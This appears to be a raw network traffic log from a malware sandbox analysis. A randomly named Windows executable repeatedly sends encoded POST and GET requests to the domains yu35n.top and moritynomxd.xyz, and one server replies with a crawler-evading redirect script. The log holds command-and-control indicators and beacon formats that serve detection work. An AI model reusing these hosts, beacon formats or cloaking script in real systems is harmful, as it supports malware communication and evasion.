Jan 10, 2025 20:09:40.292552948 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 19:09:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close x-sorting-hat-podid: 304 x-sorting-hat-shopid: 89575588145 x-storefront-renderer-rendered: 1 location: https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76 x-redirect-reason: https_required x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: 89575588145 x-shardid: 304 vary: Accept powered-by: Shopify server-timing: processing;dur=18, db;dur=9, db_async;dur=6.575, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="s7dg", requestID;desc="193bee23-2f70-4845-aae6-b58d8b9740e4-1736536180" x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1 x-request-id: 193bee23-2f70-4845-aae6-b58d8b9740e4-1736536180 Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtL3kabCH4NtnEQlgO3owyQwlEx2B8dYl9ZRKa3BK758ID7v8SGe3aXGNF6ao8uDCcH9LwvIivqP74z0sKa5%2BvkveKDZIm8IqwZRoVfBaTRnkHI6laGDVo0sHOZ85bEEV8l8 Data Raw: Data Ascii:
Jan 10, 2025 20:09:40.292572975 CET	352	IN	Data Raw: 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f Data Ascii: Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=77.000141X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49984	154.23.178.183	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:09:55.727380991 CET	614	OUT	POST /k4q2/ HTTP/1.1 Host: www.yu35n.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.yu35n.top Referer: http://www.yu35n.top/k4q2/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 213 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 43 76 52 61 32 39 77 34 31 75 5a 6b 76 6a 33 6d 65 64 70 51 33 57 72 4a 52 7a 75 38 51 62 6f 73 58 4c 62 67 2b 56 73 4d 43 43 69 2f 4e 70 76 4d 67 4c 6f 61 49 71 69 6f 44 2f 56 69 4c 74 72 69 37 78 64 72 56 70 6f 70 30 64 74 72 73 78 6f 64 46 78 46 2b 2b 34 32 6e 41 2b 64 36 7a 72 43 76 77 44 6b 78 46 32 66 4e 30 47 52 54 32 33 79 66 44 4a 6d 5a 4c 77 6d 48 79 2f 62 58 6c 71 63 55 32 35 61 48 4f 68 48 52 77 58 72 70 45 67 55 45 54 67 62 59 4c 4c 64 75 78 38 56 55 7a 34 46 75 42 30 47 4f 41 6d 55 66 7a 49 56 6f 6b 65 6d 69 6b 73 79 4c 79 58 48 33 5a 4e 73 68 52 56 2f 67 Data Ascii: bxDtSjJ8=GD4o3MuP+4K8CvRa29w41uZkvj3medpQ3WrJRzu8QbosXLbg+VsMCCi/NpvMgLoaIqioD/ViLtri7xdrVpop0dtrsxodFxF++42nA+d6zrCvwDkxF2fN0GRT23yfDJmZLwmHy/bXlqcU25aHOhHRwXrpEgUETgbYLLdux8VUz4FuB0GOAmUfzIVokemiksyLyXH3ZNshRV/g
Jan 10, 2025 20:09:56.612174988 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:09:56 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811755-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49985	154.23.178.183	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:09:58.266921997 CET	638	OUT	POST /k4q2/ HTTP/1.1 Host: www.yu35n.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.yu35n.top Referer: http://www.yu35n.top/k4q2/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 237 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 4e 75 68 61 7a 63 77 34 68 2b 59 57 7a 7a 33 6d 4c 74 70 55 33 58 58 4a 52 33 33 68 51 76 45 73 53 65 6e 67 2f 55 73 4d 48 43 69 2f 47 4a 76 4e 71 72 6f 72 49 71 75 61 44 36 31 69 4c 70 44 69 37 7a 31 72 56 65 38 71 31 4e 74 74 67 52 6f 66 42 78 46 2b 2b 34 32 6e 41 39 68 41 7a 71 71 76 77 7a 55 78 48 53 72 4b 71 57 52 51 78 33 79 66 48 4a 6e 51 4c 77 6d 70 79 36 36 66 6c 73 51 55 32 37 53 48 4b 6c 72 65 36 58 72 6a 62 51 56 6f 55 7a 69 6a 53 4b 56 6a 35 2f 31 35 72 71 74 6d 4e 69 48 55 63 56 55 38 68 59 31 71 6b 63 2b 51 6b 4d 79 68 77 58 2f 33 4c 61 67 47 65 68 61 44 6e 32 7a 71 72 65 6c 36 67 62 46 49 66 66 77 39 6a 4e 41 30 4b 51 3d 3d Data Ascii: bxDtSjJ8=GD4o3MuP+4K8Nuhazcw4h+YWzz3mLtpU3XXJR33hQvEsSeng/UsMHCi/GJvNqrorIquaD61iLpDi7z1rVe8q1NttgRofBxF++42nA9hAzqqvwzUxHSrKqWRQx3yfHJnQLwmpy66flsQU27SHKlre6XrjbQVoUzijSKVj5/15rqtmNiHUcVU8hY1qkc+QkMyhwX/3LagGehaDn2zqrel6gbFIffw9jNA0KQ==
Jan 10, 2025 20:09:59.178783894 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:09:59 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811755-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49986	154.23.178.183	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:00.814007044 CET	1651	OUT	POST /k4q2/ HTTP/1.1 Host: www.yu35n.top Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.yu35n.top Referer: http://www.yu35n.top/k4q2/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1249 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 4e 75 68 61 7a 63 77 34 68 2b 59 57 7a 7a 33 6d 4c 74 70 55 33 58 58 4a 52 33 33 68 51 76 4d 73 53 4d 66 67 2b 33 55 4d 45 43 69 2f 46 4a 76 41 71 72 6f 79 49 70 65 65 44 36 35 59 4c 76 48 69 71 67 4e 72 64 4b 51 71 73 64 74 74 39 68 6f 61 46 78 45 6b 2b 34 6e 67 41 2b 5a 41 7a 71 71 76 77 78 38 78 41 47 66 4b 6f 57 52 54 32 33 79 44 44 4a 6e 38 4c 77 2f 55 79 36 50 39 6c 63 77 55 78 59 36 48 4d 47 54 65 32 58 72 6c 61 51 56 77 55 79 65 38 53 4b 59 61 35 2b 52 54 72 71 5a 6d 49 6e 47 56 4d 57 55 6f 34 4c 46 4a 38 2f 37 78 6e 36 50 55 2b 67 54 6d 46 62 41 51 57 6a 32 79 73 52 62 38 72 74 51 61 75 71 51 68 63 4b 31 2f 77 2b 74 66 65 6b 73 51 34 6c 35 2f 42 61 71 59 56 30 66 46 32 54 52 6d 71 55 6a 4b 61 72 2b 55 6e 33 49 6e 69 68 4d 6f 49 65 76 74 30 49 49 59 4f 4a 55 38 6d 30 57 6d 44 61 37 38 42 2b 37 6d 79 31 67 76 7a 45 50 54 37 36 57 37 34 67 44 6f 59 49 38 45 67 43 7a 30 31 61 67 49 56 37 36 30 33 48 72 52 77 66 79 6f 50 69 64 4f 2b [TRUNCATED] Data Ascii: bxDtSjJ8=GD4o3MuP+4K8Nuhazcw4h+YWzz3mLtpU3XXJR33hQvMsSMfg+3UMECi/FJvAqroyIpeeD65YLvHiqgNrdKQqsdtt9hoaFxEk+4ngA+ZAzqqvwx8xAGfKoWRT23yDDJn8Lw/Uy6P9lcwUxY6HMGTe2XrlaQVwUye8SKYa5+RTrqZmInGVMWUo4LFJ8/7xn6PU+gTmFbAQWj2ysRb8rtQauqQhcK1/w+tfeksQ4l5/BaqYV0fF2TRmqUjKar+Un3InihMoIevt0IIYOJU8m0WmDa78B+7my1gvzEPT76W74gDoYI8EgCz01agIV7603HrRwfyoPidO+5xGDcYsflPfB/E1aY+r5rtxAavA5CX9gvRMytixKot6CxdI9vRhVs0xRGkrpbmPtNr/O6Ra7ljub0DJH4UFiAFVIZwg+YiE7bT8BNnWyuGFw7VUENGhLKsRJ19TRH4t33NamPpCoA25Gn7reWst8snhUykN4xr24cpfmXjSpi2AbJbouh7PzKJbCMHYopxmpJD75Hxav/cEV71vNqts8IMeVoZaSU2wZ8THDdQJ5VOV+9aQLcGOG7MMO+lDe111TU/YmICO0xntrZc3StyCKqChoVDuKG1HAbMy0TmA1AJ1SjiZFZ81+uVDQlYn8yZiNukujXDQTT4YMFZgAQmB4FWMFoo0sF30oXSJB/NMQ6vMhM91S5QydwajuuHLjwU3kebIow39VO9UylHpGeZjTAoIHxjuxRFKHda24eAxxPa1d6skCepM7ZpiAaaXjt32WhXcp2jKNKaU0IK+310Nao9rihp9NULka/yy4By6i5oAq16gd0+3yZbcCCuJIS0xd3yV00GIx71oq7xm6p/K4o3blZvCqrbEiK2zfTViiTXbG0AwIgFPUVH3xiIbJ1BYogurbJPAjwIp0SFCrYxjxElEqD6scTD9C+O6YjMsewFsu+xpF2wic3V7psAQFuTtdNt5LvEvprcWdlvKECC5rk9OBt0FlQlPdzQ [TRUNCATED]
Jan 10, 2025 20:10:01.790316105 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:10:01 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811755-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49987	154.23.178.183	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:03.358057976 CET	366	OUT	GET /k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76 HTTP/1.1 Host: www.yu35n.top Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
Jan 10, 2025 20:10:04.434075117 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:10:04 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811755-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49988	45.158.77.253	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:09.485786915 CET	632	OUT	POST /o5i7/ HTTP/1.1 Host: www.moritynomxd.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.moritynomxd.xyz Referer: http://www.moritynomxd.xyz/o5i7/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 213 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 6a 4e 4a 67 59 70 76 73 41 39 53 5a 47 66 36 56 49 6c 44 51 7a 59 75 4d 44 67 33 44 4d 53 4f 4e 4d 4f 5a 44 45 39 53 59 71 52 35 37 77 53 31 63 69 68 79 31 56 41 58 31 78 46 2b 6b 4f 70 66 53 72 45 35 42 63 2b 78 47 4b 55 4b 64 71 77 63 59 39 77 70 4f 6d 48 54 4b 5a 7a 2b 4f 75 69 59 70 71 5a 73 31 41 73 34 6f 67 31 4d 44 66 66 2f 6e 70 6d 44 55 78 76 43 72 47 48 43 41 56 51 70 53 63 61 67 2f 46 4d 35 70 33 45 57 66 78 64 6d 77 6f 50 6a 51 58 49 5a 64 71 57 38 31 62 36 78 57 5a 45 35 34 45 6e 36 47 54 67 4a 42 77 32 76 4b 5a 6a 35 4f 71 52 68 66 4d 6b 42 6c 61 62 37 75 Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YjNJgYpvsA9SZGf6VIlDQzYuMDg3DMSONMOZDE9SYqR57wS1cihy1VAX1xF+kOpfSrE5Bc+xGKUKdqwcY9wpOmHTKZz+OuiYpqZs1As4og1MDff/npmDUxvCrGHCAVQpScag/FM5p3EWfxdmwoPjQXIZdqW81b6xWZE54En6GTgJBw2vKZj5OqRhfMkBlab7u
Jan 10, 2025 20:10:10.167418003 CET	729	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Address: gin_throttle_mw_7200000000_8.46.123.189 X-Ratelimit-Limit: 500 X-Ratelimit-Remaining: 499 X-Ratelimit-Reset: 1736539810 Date: Fri, 10 Jan 2025 19:10:10 GMT Content-Length: 458 Connection: close Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED] Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49989	45.158.77.253	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:12.032351017 CET	656	OUT	POST /o5i7/ HTTP/1.1 Host: www.moritynomxd.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.moritynomxd.xyz Referer: http://www.moritynomxd.xyz/o5i7/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 237 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 69 74 56 67 55 71 33 73 47 64 53 65 49 2f 36 56 65 56 44 55 7a 59 79 4d 44 69 62 74 4d 67 36 4e 4d 72 31 44 44 50 32 59 70 52 35 37 37 79 31 5a 74 42 7a 33 56 41 62 39 78 45 43 6b 4f 70 62 53 72 45 70 42 62 4e 4a 46 4c 45 4b 54 7a 67 63 67 7a 51 70 4f 6d 48 54 4b 5a 79 62 47 75 69 51 70 71 6f 63 31 42 49 73 76 71 56 4d 45 65 66 2f 6e 74 6d 44 51 78 76 44 47 47 47 66 6c 56 53 42 53 63 61 77 2f 46 64 35 71 2b 45 57 46 2b 39 6e 56 74 2b 47 62 63 49 51 63 73 48 55 71 43 62 34 77 52 53 34 69 59 55 36 6c 42 77 70 44 77 30 33 34 5a 44 35 6b 6f 52 5a 66 65 7a 4e 43 56 76 65 4e 43 6b 69 58 58 77 4c 4f 4f 4e 74 78 35 4e 30 7a 31 61 61 36 32 41 3d 3d Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YitVgUq3sGdSeI/6VeVDUzYyMDibtMg6NMr1DDP2YpR577y1ZtBz3VAb9xECkOpbSrEpBbNJFLEKTzgcgzQpOmHTKZybGuiQpqoc1BIsvqVMEef/ntmDQxvDGGGflVSBScaw/Fd5q+EWF+9nVt+GbcIQcsHUqCb4wRS4iYU6lBwpDw034ZD5koRZfezNCVveNCkiXXwLOONtx5N0z1aa62A==
Jan 10, 2025 20:10:12.732523918 CET	729	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Address: gin_throttle_mw_7200000000_8.46.123.189 X-Ratelimit-Limit: 500 X-Ratelimit-Remaining: 498 X-Ratelimit-Reset: 1736539810 Date: Fri, 10 Jan 2025 19:10:12 GMT Content-Length: 458 Connection: close Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED] Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49990	45.158.77.253	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:14.586193085 CET	1669	OUT	POST /o5i7/ HTTP/1.1 Host: www.moritynomxd.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.moritynomxd.xyz Referer: http://www.moritynomxd.xyz/o5i7/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1249 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 69 74 56 67 55 71 33 73 47 64 53 65 49 2f 36 56 65 56 44 55 7a 59 79 4d 44 69 62 74 4d 67 69 4e 50 64 68 44 41 75 32 59 6f 52 35 37 6e 69 31 59 74 42 7a 32 56 44 72 48 78 45 4f 53 4f 71 7a 53 35 32 52 42 65 34 6c 46 65 55 4b 54 37 41 63 62 39 77 6f 4b 6d 44 2f 47 5a 7a 72 47 75 69 51 70 71 72 45 31 49 38 34 76 73 56 4d 44 66 66 2f 67 70 6d 44 30 78 76 61 7a 47 47 62 62 56 69 68 53 66 37 41 2f 44 72 74 71 78 45 57 44 39 39 6e 33 74 2b 36 55 63 49 63 36 73 48 51 51 43 5a 6b 77 52 58 6b 30 4b 58 47 35 63 42 46 46 69 48 4c 71 5a 6c 70 53 73 54 4d 6a 51 54 55 7a 63 4f 4b 37 62 46 57 70 55 78 2b 43 50 62 42 49 6d 70 52 58 6a 70 6e 71 31 65 4b 5a 32 72 79 75 33 79 73 6c 44 78 7a 2f 6d 66 56 58 72 63 45 64 79 4f 52 68 35 74 43 30 56 6a 7a 59 38 4e 49 6e 56 41 2f 4f 50 75 64 76 66 58 55 33 73 6d 48 54 38 6f 6b 6e 50 47 36 75 51 4f 64 4b 63 4b 37 48 32 77 70 49 39 2f 6a 36 52 55 67 32 74 2f 48 43 47 66 6b 34 6a 43 30 6c 6d 41 73 4a 71 6e 56 41 32 [TRUNCATED] Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YitVgUq3sGdSeI/6VeVDUzYyMDibtMgiNPdhDAu2YoR57ni1YtBz2VDrHxEOSOqzS52RBe4lFeUKT7Acb9woKmD/GZzrGuiQpqrE1I84vsVMDff/gpmD0xvazGGbbVihSf7A/DrtqxEWD99n3t+6UcIc6sHQQCZkwRXk0KXG5cBFFiHLqZlpSsTMjQTUzcOK7bFWpUx+CPbBImpRXjpnq1eKZ2ryu3yslDxz/mfVXrcEdyORh5tC0VjzY8NInVA/OPudvfXU3smHT8oknPG6uQOdKcK7H2wpI9/j6RUg2t/HCGfk4jC0lmAsJqnVA2O9pSwSN/ScVUitrI2du7AIDPu0CF2wrkSS35YPY/1gZvWCwvYQS3Bt/ZktaToCsVpa30PXYZlaU32ylGAvHx5EwKb6Zoy8d3KMP6HLz6/rjvcJk1C4QXX8YvGmGOaAZzbYtzbA2vLAWtI+yoc5imydOUu6wk6mwP8eA7HL2pn3yf8xSoLOrRV7QW8VRqbtxOcmvK2CoK2+i19nTXERJ0LiRZDTwnWrWK7H0gWYL2qr3O5JXxvbhu74LOEo82YkEyhhReZunP6MPcqs7tz5Zrp/Zaikzl6imDzvy3mN4swFlfQl7hhkiCsEpy8rW73LAhU9gz6o8X9FsRzi/A22Uut/O9FdTkTicABRlLUICalcE8Zng5gy7rEgxDf5MJveHQ/eH6azhit9d5/lugQWLMKrG9BIiMiW+hH1qMPPODyZdCK5GOjEypCyr8a/L/roNYH7CD+Wyka25jlCCAvMmPdH7n9qRY4inA1Clwum945pEPjCfxZqSfgoMRe0XQjkah7tPD8fflw/dBx7L6Gx2wRgEwXc4FbFGXSd9vGKl